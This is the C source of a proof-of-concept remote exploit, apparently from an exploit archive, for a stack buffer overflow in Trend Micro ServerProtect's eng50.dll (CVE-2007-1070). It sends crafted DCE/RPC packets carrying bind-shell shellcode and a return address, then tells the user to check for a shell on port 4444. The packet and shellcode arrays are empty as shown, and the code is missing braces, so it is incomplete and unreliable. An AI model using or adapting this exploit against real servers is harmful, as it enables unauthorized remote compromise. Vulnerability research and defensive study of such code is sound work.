
Related Vulnerabilities: CVE-2007-1070  
Publish Date: 06 Sep 2007
Author: devcode
 * Copyright (c) 2007 devcode
 *      ^^ D E V C O D E ^^
 * Trend Micro ServerProtect eng50.dll Stack Overflow
 * [CVE-2007-1070]
 * Description:
 *    A boundary error within a function in eng50.dll can be
 *    exploited to cause a stack-based buffer overflow via a
 *    specially crafted RPC request to the SpntSvc.exe service.
 * Hotfix/Patch:
 * Vulnerable systems:
 *    ServerProtect for Windows 5.58
 *    ServerProtect for EMC 5.58
 *    ServerProtect for Network Appliance Filer 5.61
 *    ServerProtect for Network Appliance Filer 5.62
 * Tested on:
 *     Microsoft Windows 2000 SP4
 *    This is a PoC and was created for educational purposes only. The
 *    author is not held responsible if this PoC does not work or is 
 *    used for any other purposes than the one stated above.
 * Notes:
 *    <3 TippingPoint for technical details. Had this made few days after
 *    disclosure (few months back), was rlsd on r1918 about a week ago 
 *    and I notice trend micro exploit reports on DIDNT KNOW
#include <iostream>
#include <windows.h>
#pragma comment( lib, "ws2_32.lib" )
/* 25288888-bd5b-11d1-9d53-0080c83a5c2c v1.0 */
unsigned char uszDceBind[] =
/* rpc_opnum_0 */
unsigned char uszDceCall[] =
/* win32_bind -  EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov */
unsigned char uszShellcode[] =
void usage( ) {
  printf("\n\t\tTrend Micro ServerProtect Stack Overflow\n"
      "\t\t\t(c) 2007 devcode\n\n"
      "usage: tmicro.exe <ip> <port>\n");
int main( int argc, char **argv ) {
  WSADATA wsaData;
  SOCKET sConnect;
  SOCKADDR_IN sockAddr;
  char szRecvBuf[512];
  unsigned char uszPacket[2056];
  int nRet;
  if ( argc < 3 ) {
    usage( );
    return -1;
  if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) {
    printf("[-] Unable to startup winsock\n");
    return -1;
  sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
  if ( sConnect == INVALID_SOCKET ) {
    printf("[-] Invalid socket\n");
    return -1;
  sockAddr.sin_family = AF_INET;
  sockAddr.sin_addr.s_addr = inet_addr( argv[1] );  
  sockAddr.sin_port = htons( atoi( argv[2] ) );
  printf("[+] Connecting to %s:%s\n", argv[1], argv[2] );
  nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) );
  if ( nRet == SOCKET_ERROR ) {
    printf("[-] Cannot connect to server\n");
    closesocket( sConnect );
    return -1;
  printf("[+] Sending DCE Bind packet...\n");
  nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 );
  if ( nRet  == SOCKET_ERROR ) {
    printf("[-] Cannot send\n");
    closesocket( sConnect );
    return -1;
  nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
  if ( nRet <= 0 ) {
    printf("[-] Recv failed\n");
    closesocket( sConnect );
    return -1;
  memset( uszPacket, 0x41, sizeof( uszPacket ) );
  memcpy( uszPacket, (const char *)uszDceCall, sizeof( uszDceCall ) );
  memcpy( uszPacket+48, uszShellcode, sizeof( uszShellcode ) - 1 );
  /* call ebx, 0x6574131C, TmRpcSrv.dll */
  /* jmp ebx, 0x7C4E4A66, kernel32.dll */
  memcpy( uszPacket + 1198, "\x1C\x13\x74\x65", 4 );
  memcpy( uszPacket + 2048, "\xD0\x07\x00\x00\xD0\x07\x00\x00", 8 );
  printf("[+] Sending DCE Request packet...\n");
  nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
  if ( nRet == SOCKET_ERROR ) {
    printf("[-] Cannot send\n");
    closesocket( sConnect );
    return -1;
  printf("[+] Check shell on port 4444 :)\n");  
  nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );  
  closesocket( sConnect );
  return 0;
